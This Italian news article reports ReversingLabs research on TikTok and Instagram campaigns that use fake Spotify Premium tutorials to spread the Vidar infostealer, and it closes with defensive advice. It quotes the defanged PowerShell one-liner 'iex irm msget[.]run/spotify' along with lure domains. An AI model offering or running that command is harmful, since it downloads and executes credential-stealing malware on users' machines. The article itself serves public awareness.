DeafNews
// 1 ZERO-DAY · 2 CVE · 1 EXPLOIT NELLE ULTIME 24H
Cybersecurity

Sfruttano l'algoritmo: così TikTok e Instagram amplificano il malware Vidar

Published: Updated: By DeafSuite team 8 min read Cybersecurity
Condividi
WhatsApp Facebook X (Twitter) LinkedIn Reddit Telegram Email
Ricerca ReversingLabs: criminali usano video tutorial falsi su Spotify Premium per diffondere infostealer Vidar via PowerShell, sfruttando i pesi algoritmici di

Il 9 giugno 2026, ReversingLabs ha documentato due campagne in corso che usano TikTok e Instagram Reels per distribuire l'infostealer Vidar attraverso video tutorial falsi su Spotify Premium e altri software a pagamento. Gli attaccanti hanno compreso e sfruttato i pesi algoritmici delle piattaforme, dove salvataggi e condivisioni contano più dei like, amplificando organicamente la visibilità dei contenuti malevoli.

Punti chiave
  • ReversingLabs ha identificato due campagne distinte su TikTok e Instagram Reels che usano tutorial falsi su Spotify Premium per distribuire l'infostealer Vidar tramite comandi PowerShell.
  • Un singolo video ha accumulato oltre 100.000 visualizzazioni, 1.699 salvataggi e 974 condivisioni: gli attaccanti puntano deliberatamente su save e share perché gli algoritmi le pesano più dei like.
  • I comandi PowerShell seguono la struttura iex irm msget[.]run/spotify e scaricano build.exe, confermato da Spectra Analyze come payload Vidar.
  • Gli account malevoli windows.tips e windows.insights imitano il branding Microsoft con avatar blue crown, sfruttando la familiarità dell'utente con il marchio.

Come funziona la campagna "tutorial"

La prima campagna si presenta con video tecnicamente curati, voiceover generati da AI e account che replicano l'identità visiva Microsoft. I nomi windows.tips e windows.insights non sono casuali: il blue-and-white branding costruisce un ponte di fiducia che parte dall'utente familiare con Windows e atterra su istruzioni tecniche apparentemente legittime.

I video guidano l'utente apertamente verso PowerShell, con istruzioni vocali o testuali per eseguire iex irm msget[.]run/spotify — un one-liner che combina Invoke-Expression, Invoke-RestMethod e un dominio lookalike. Il risultato è il download di build.exe, identificato da ReversingLabs Spectra Analyze come Vidar, infostealer attivo dal 2018 e commercializzato come malware-as-a-service a 300 dollari per licenza a vita. L'ultimo aggiornamento documentato risale all'ottobre 2025, con miglioramenti a stabilità ed evasione.

La scelta di PowerShell non è architettura ad alto rischio: è strumento legittimo presente su ogni sistema Windows, e l'utente medio non distingue tra un comando di sistema e uno che scarica malware. Come hanno notato i ricercatori di ReversingLabs: "Un utente non tecnico non sa distinguere, e può assumere che sia legittimo. Gli attaccanti contano su questa mancanza di comprensione".

Il gaming algoritmico: saves e shares come leva

Il dato che distingue questa campagna dalla semplice distribuzione virale è la consapevolezza degli attaccanti sui pesi algoritmici. ReversingLabs ha documentato 1.699 salvataggi contro 1.581 like sullo stesso video che ha superato le 100.000 visualizzazioni, con 974 condivisioni aggiuntive. La strategia non punta alla popolarità apparente ma all'ottimizzazione per le metriche che TikTok e Instagram pesano di più nei loro modelli di raccomandazione.

Salvataggi e condivisioni segnalano contenuto "utile" o "da consultare più tardi": l'algoritmo li premia con maggiore visibilità nei feed esplorativi. Gli attaccanti hanno quindi costruito i video per massimizzare queste interazioni, non i like passivi. Il risultato è che l'algoritmo amplifica organicamente il contenuto malevolo, estendendone la portata a utenti che non hanno mai cercato contenuti pirata.

"I due approcci sono mezzi per fini diversi, e le differenze dimostrano come gli attaccanti possono sfruttare diversi aspetti dell'engagement sui social media per raggiungere più potenziali vittime" — ricercatori ReversingLabs

La seconda campagna: engagement baiting e survey gates

La seconda campagna documentata da ReversingLabs usa un registro meno tecnico: video più grezzi che promettono accesso gratuito a Spotify Premium, con commenti abilitati come primo strato di interazione. Qui l'attacco non parte immediatamente con PowerShell, ma con il reply-baiting: l'attaccante risponde ai commenti con link a tutorial più dettagliati o a pagine profilo che reindirizzano verso siti come d4ug[.]site, pluginchad[.]xyz e maxapk[.]xyz.

Su questi domini, l'accesso al presunto software è bloccato da survey da completare. I ricercatori di ReversingLabs non sono riusciti a completare i questionari, quindi il payload finale di questa seconda catena resta non verificato. Non è possibile affermare che Vidar sia anche qui il malware consegnato: il dossier documenta il blocco metodologico, non il risultato. La struttura tuttavia conferma la flessibilità tattica: dove la prima campagna punta sull'esecuzione immediata, la seconda costruisce fiducia attraverso l'interazione sociale prima del delivery.

Un elemento di controllo del narrativo emerge nelle dinamiche di moderazione. ReversingLabs riferisce che i creatori dei video malevoli cancellano sistematicamente i commenti di avvertimento, e che i tentativi di segnalare contenuti a Instagram come scam sono stati rifiutati durante l'investigazione. La piattaforma ha quindi lasciato attivo materiale segnalato da ricercatori di sicurezza, senza che il dossier specifichi se l'accessibilità persista al momento della pubblicazione.

Analisi: perché l'algoritmo è il vero attore

Lettura — Il trust non viene rubato con un exploit zero-day, ma con un transfer graduale. L'utente vede un video raccomandato, non cercato. Vede un account con branding Microsoft, non un dominio sospetto. Vede istruzioni passo-passo, non un avviso di sicurezza. Ogni passaggio è legittimo in sé; la catena lo è meno.

La differenza tra una campagna virale e una campagna algoritmica sta nel targeting. Il virale dipende dalla condivisione umana; l'algoritmica dal peso matematico che la piattaforma assegna a specifiche interazioni. Gli attaccanti qui hanno compreso e sfruttato questa distinzione, ottimizzando per saves e shares anziché per like passivi.

Il contesto: un pattern ricorrente, non un caso isolato

Trend Micro ha già documentato nel 2025 lo stesso stack tecnico: video TikTok, tattica ClickFix, comandi PowerShell, infostealer Vidar e StealC. I ricercatori di Trend Micro hanno osservato video che "verbalmente istruiscono gli spettatori a eseguire una sequenza di comandi per presumibilmente attivare software legittimo, come Windows OS, Microsoft Office, CapCut e Spotify", con la conclusione che "questa campagna evidenzia come gli attaccanti siano pronti a sfruttare qualunque piattaforma social media sia attualmente popolare per distribuire malware".

La ricerca di ReversingLabs, pubblicata il 9 giugno 2026, documenta attività di campagna con durata precedente non determinata. Malwarebytes ha corroborato i risultati, notando che attacchi simili basati su TikTok aggiungono comunemente esclusioni Windows Defender per favorire la persistenza.

Cosa fare adesso

Le seguenti raccomandazioni sono derivate editorialmente dai fatti documentati, non direttive delle fonti primarie.

  • Riconoscere che video tutorial su software pirata o gratuito su piattaforme social richiedono verifica indipendente: nessun brand tecnico legittimo guida utenti verso PowerShell via social media.
  • Verificare che i comandi PowerShell proposti in contenuti social non usino pattern iex irm con domini esterni: questa struttura esegue codice remoto senza controllo.
  • Segnalare account che imitano branding Microsoft con nomi come windows.tips o windows.insights: il mascheramento di identità aziendale è indicatore di campagna documentata.
  • Considerare che salvataggi e condivisioni elevati su contenuti tecnici possono riflettere ottimizzazione algoritmica malevola, non qualità autentica.

Chiusura

La campagna documentata da ReversingLabs il 9 giugno 2026 mostra due metodologie distinte unite da un principio comune: la comprensione dei meccanismi di raccomandazione delle piattaforme. Dove la prima campagna punta sull'esecuzione tecnica immediata, la seconda costruisce fiducia attraverso l'interazione sociale. Entrambe sfruttano la stessa vulnerabilità — la familiarità dell'utente con l'interfaccia e l'algoritmo — per trasformare piattaforme di intrattenimento in canali di distribuzione malware.

La ricerca originale è di ReversingLabs; altre fonti citate riportano i medesimi risultati senza analisi tecnica indipendente. Le informazioni si basano sul report pubblicato il 9 giugno 2026, con attività di campagna precedente di durata non determinata.

Le informazioni sono state verificate sulle fonti citate e aggiornate al momento della pubblicazione.

Sul tema

  • GHOST STADIUM e il panorama globale: 300 domini attivi, 3.800 in attesa
  • SRG fast flux: botnet IoT globale protegge data leak site
  • Malware bug: 90% campioni leaked hanno weakness sfruttabili

Fonti

Fonti e riferimenti
  1. reversinglabs.com
  2. helpnetsecurity.com
  3. malwarebytes.com
  4. infosecurity-magazine.com
  5. unit42.paloaltonetworks.com
  6. thehackernews.com